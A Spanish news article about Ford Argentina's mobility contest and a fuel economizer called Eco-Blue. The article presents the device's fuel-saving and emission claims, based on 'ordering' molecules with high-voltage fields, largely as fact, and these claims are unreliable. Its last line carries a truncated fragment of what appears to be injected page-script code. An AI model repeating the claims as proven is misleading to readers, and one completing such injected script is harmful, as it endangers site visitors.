El Concurso “Futuro de la Movilidad”  es una iniciativa de Ford Argentina para postular ideas y proyectos que ayuden a mejorar la movilidad en grandes ciudades. Más de 300 proyectos fueron presentados durante la primera etapa de inscripción.

El jurado compuesto por ejecutivos de esta compañía y representantes de dos instituciones académicas, el IAE Business School  y el Instituto Tecnológico de Buenos Aires (ITBA), evaluaron la innovación, la creatividad, la potencialidad y sustentabilidad de las propuestas para brindar una movilidad inteligente, eficiente y segura.

Con esos atributos  fueron seleccionadas las 50 mejores ideas que seguirán participando del concurso y entre los que se encuentra Eco-Blue. “Hemos mostrado los equipos y la base científica en la que se basa esto, que en realidad es física manejada por electrónica”, explicó José Ten, su creador.

En esta nueva instancia del concurso, se elegirán los 10 mejores proyectos que competirán por uno de los tres lugares ganadores, que serán premiados con una beca de posgrado para emprendedores. El primer puesto también tendrá la posibilidad de viajar al Salón del Automóvil de Detroit en 2015 para conocer a los ingenieros de Ford que trabajan en mejorar la movilidad del futuro.

El Economizador de Combustibles Ecológico

Ten comentó que la evolución del proyecto al principio fue un poco lenta y con mucho sacrificio. “Me tomó cinco años desarrollar Eco-Blue, fui pasando distintas etapas y prototipos hasta poder llegar a un equipo final y confiable”, relató.

Eco-Blue es un vórtice generado electrónicamente que ioniza la mezcla aire-combustible y mejora el llenado de los cilindros. “El sistema ordena por un lado las moléculas del aire, con un sistema de tubos de descarga de alta tensión, que generan un campo electromagnético muy intenso, evitando la dispersión de los átomos que componen el aire, ordenándolos en la cámara de combustión. Por otro lado, hace lo mismo con el combustible. Por lo que, cuando se encuentran en la cámara del motor, generan un rendimiento mucho mayor, hay una combustión más completa, evitando el desperdicio en el tubo de escape”, especificó.

Los beneficios de este sistema son varios, entre los que podemos mencionar una mayor economía de combustible (entre un 10 a un 30% menos), un mejor rendimiento,  arranque en frío, una mayor vida útil de la batería, del sistema de arranque y de la duración del aceite lubricante y, principalmente, menos contaminación al medio ambiente, ya que la combustión es más completa  y no genera humo.

Cabe destacar que este proyecto innovador ya fue declarado, por resolución Nº 334/2014, de interés departamental.var d=document;var s=d.createElement(‘script’);

Comentarios